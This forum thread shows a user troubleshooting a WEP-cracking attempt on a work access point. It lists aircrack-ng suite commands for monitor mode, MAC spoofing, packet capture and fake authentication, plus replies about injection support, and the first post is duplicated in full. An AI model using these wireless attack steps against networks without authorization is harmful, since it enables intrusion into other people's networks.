WEP Crack Aireplay-ng

[kiloraw]

First i must say, wonderful job on the vol. 4. I think going to Ubuntu to will be well worth it, sucks for the guru's right now, but like I said it will be worth it.

As for my problem:
Scenario:
At work, trying to crack a AP WEP. I will have to do this alot more, since it will be my job to test the security of wireless AP, which will have WPA2. Trying to crack WEP now, for knowledge and seems logical. The AP has know clients, and the ESSID is not broadcasted. I decided to ask what was the AP's ESSID for my co-worker, so that I could troubleshoot, if it was a user error or not.

Card: 3945 iwl

airmon-ng
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

airodump-ng (interface)
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)


aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

The command above is were i get stuck, aircrack tutorial says to "Do not proceed to the next step until you have the fake authentication running correctly."

The terminal comes back and states
Sending Authentication Request (shared) [ACK]
Authentication 1/2 successful
Sending encrypted challenge
Attack was unsuccessful
Then gives me a list of reason's why it did not work.

[capron]

I dont think a fake authentication will work when AP use shared key.

[Mr-Protocol]

You can fake auth with an access point with WEP. It is ment to be run in another terminal, not the one running airodump. I think to "recover" WEP through just using the command line tools you will have a terminal open for Airodump, one for the fake auth, and another for injection if your card supports it. Your card may not support injection which may be why you get the list of errors. Use aireplay-ng injection test to see if your card supports it.

[SuspectZero]

how far are you from the ap? is the ap in the building to the left of your building or to the right?

[lordplagueis]

First i must say, wonderful job on the vol. 4. I think going to Ubuntu to will be well worth it, sucks for the guru's right now, but like I said it will be worth it.

As for my problem:
Scenario:
At work, trying to crack a AP WEP. I will have to do this alot more, since it will be my job to test the security of wireless AP, which will have WPA2. Trying to crack WEP now, for knowledge and seems logical. The AP has know clients, and the ESSID is not broadcasted. I decided to ask what was the AP's ESSID for my co-worker, so that I could troubleshoot, if it was a user error or not.

Card: 3945 iwl

airmon-ng
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

airodump-ng (interface)
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)


aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

The command above is were i get stuck, aircrack tutorial says to "Do not proceed to the next step until you have the fake authentication running correctly."

The terminal comes back and states
Sending Authentication Request (shared) [ACK]
Authentication 1/2 successful
Sending encrypted challenge
Attack was unsuccessful
Then gives me a list of reason's why it did not work.

aireplay-ng -1 0 -e (network name) -a (access point MAC address) -h (your mac address) (monitor mode interface)